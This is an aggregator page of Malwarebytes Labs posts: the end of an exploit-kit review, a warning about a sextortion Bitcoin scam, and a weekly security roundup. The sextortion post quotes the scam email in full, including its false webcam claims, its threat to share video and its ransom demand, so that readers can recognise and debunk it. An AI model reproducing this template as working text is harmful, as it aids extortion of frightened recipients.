Meanwhile, Magnitude EK is active and served up via malvertising chains, with a focus on some APAC countries like South Korea. Magnitude continues to deliver its fileless Magniber ransomware payload.

Underminer EK

Underminer’s over-the-top encryption schemes to hide its exploits are keeping us researchers honest when trying to identify exactly what is under the hood. It’s worth noting that only a few days after the Flash zero-day and Proof of Concept (PoC) had been published (CVE-2018-15982), Underminer was already implementing it.

GreenFlash Sundown EK

Also a geo-specific exploit kit, GreenFlash Sundown has been delivering various breeds of ransomware to targets in Asia. In our latest capture, we saw it drop the Seon ransomware on South Korean users.


While timely patching and avoidance of Internet Explorer as a web browser would offer protection against the above-mentioned exploit kits, the reality is that many users (especially in corporate environments) are still trailing behind. In addition, while IE is being phased out in North America, it’s still highly adopted in Asian countries—which explains why they are currently being targeted.

Malwarebytes’ anti-exploit technology blocks each of these exploit kits—Fallout, RIG, GrandSoft, Magnitude, Underminer, and GreenFlash Sundown—before they even have a chance to drop their payload.

As we move further into 2019, we can say that exploit kits, while nowhere near their peak activity in 2017, are still hanging on, being used primarily in malvertising distribution campaigns. In terms of global activity, Fallout is leading the charge, providing the most diverse campaigns and payloads. Meanwhile, the Asia-specific EKs are for the most part continuing on with their usual pattern of driving innovation (to a degree) and distributing ransomware.

The post Exploit kits: winter 2019 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Sextortion Bitcoin scam makes unwelcome return

Malwarebytes - Mon, 02/11/2019 - 18:38

Heads up: a particularly nasty sextortion Bitcoin scam from at least the middle of 2018 is making the rounds once again.

The scam involves making use of old breach dumps, then emailing someone from the list and reminding them of their old password.

When something lands in your mailbox with “Hey, remember this?” it’s a surefire way to focus the reader’s attention. Pressure is then applied to start sending over some Bitcoin…or else.

What is the threat being made?

The generally accepted theory is that the scammer digs up personally identifiable information from old data breaches, including email addresses and passwords, plugs it into some sort of automated script, and then fires out thousands of emails.

Those mails reach people from said breach, and they then see talk of somebody “knowing” their login details. That’s then used as leverage to claim the attacker has access to their PC, files, folders, webcams, browsing history—in a nutshell, anything personal and sensitive. The scarier they can make it sound, the better. In fact, one of the more eye-popping claims is that the scammer has video of the user viewing adult websites, and they will share this video with all the user’s contacts unless they pony up and pay a Bitcoin ransom.

And in classic ransomware fashion, there’s typically a ticking clock. Giving users a short time limit to deliver the payment is social engineering at its finest.

What next?

The recipient may well have a panic attack, that’s what. To be suddenly confronted with an ancient (but potentially still active) password is certainly going to give a bit of a shock to the system. It’s at this point the confusion sets in, as they start to wonder what on Earth the attacker has. Did they really see what they claimed to see? Do they actually have video footage? What other potentially embarrassing (or worse) content could they use to extort and blackmail?

What do they really have?

A large throne of lies, is what.

Yes, they have your password from a long time ago.

No, they do not have access to your computer. And no, even if you were checking out adult sites, they don’t have video of you doing so.

What they might have is access to your email account associated with the breach, if you haven’t changed the password since it took place. They could also potentially start trying to log into other accounts you have with the same password. If this is the case, you should fire up a password manager and get to work changing things.

In fact, you should do that if you share passwords across accounts in any case.

Okay, back to the scam.

What does the email say?

It’s a fairly standard template, and hunting for portions of the below mail will throw up any number of hits in Google and other search engines.

Click to enlarge

The email reads as follows:

I am well aware [REDACTED] is your pass words. Lets get right to point. Neither anyone has paid me to investigate you. You may not know me and you are probably thinking why you’re getting this e-mail? 

actually, i installed a software on the adult videos (pornographic material) web-site and do you know what, you visited this website to have fun (you know what i mean). While you were viewing videos, your web browser began working as a Remote Desktop that has a keylogger which gave me accessibility to your display and also cam. Just after that, my software gathered every one of your contacts from your Messenger, Facebook, as well as email . after that i created a double video. 1st part displays the video you were viewing (you’ve got a nice taste haha), and next part shows the recording of your cam, yeah its you. 

You have not one but two choices. Shall we read up on these options in aspects: 

First alternative is to just ignore this message. in such a case, i am going to send out your actual video to every single one of your personal contacts and think regarding the awkwardness you will definitely get. and definitely if you happen to be in a loving relationship, how it would affect? 

Number 2 solution is to pay me $889. Lets name it as a donation. in this situation, i most certainly will asap remove your video footage. You could carry on daily life like this never occurred and you surely will never hear back again from me.

You’ll make the payment through Bi‌tco‌in (if you don’t know this, search for ‘how to buy b‌itcoi‌n’ in Google). 

B‌T‌C‌ ad‌dre‌ss to send to: [REDACTED]

[CaSe sensitive, copy & paste it] 

if you are wondering about going to the law enforcement officials, well, this message can not be traced back to me. I have dealt with my actions. i am also not attempting to demand a huge amount, i would like to be compensated. within this%} emaiQUNdkpeC [SIC] if i do not receive the ‌bi‌tco‌in‌, i will send your video recording to all of your contacts including family members, coworkers, and so forth. Having said that, if i receive the payment, i will erase the recording immediately. If you really want proof, reply Yup then i will send out your video to your 9 friends. This is a non-negotiable offer, so don’t waste mine time and yours by replying to this e mail.

That’s pretty sneaky

It is, and I’d be surprised if there aren’t many others waking up to emails identical to the above. Should you receive one yourself, do the following:

  1. Don’t panic. They absolutely do not have the keys to your computer.
  2. See if the email in question pops up over on Haveibeenpwned.
  3. See if your password does the same thing.
  4. At this point, you may have a fairly good idea which breach they grabbed your old login from, which is always useful information to have.
  5. Delete the email you were sent, and under no circumstances pay them a penny/dime/insert currency of choice here.
Scare tactics: an evil practice

The anonymous sender of these mails doesn’t care about the trauma they could cause at the other end. These missives would be particularly traumatic for anyone involved in (say) a revenge porn case previously. And make no mistake, generic Internet blackmail threats can kill.

If you’re able to report these mails for spam/abuse before deleting, do so. There’s a remote chance you could actually save someone’s life while making the Internet a little safer into the bargain.

The post Sextortion Bitcoin scam makes unwelcome return appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (February 4 – 8)

Malwarebytes - Mon, 02/11/2019 - 17:05

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds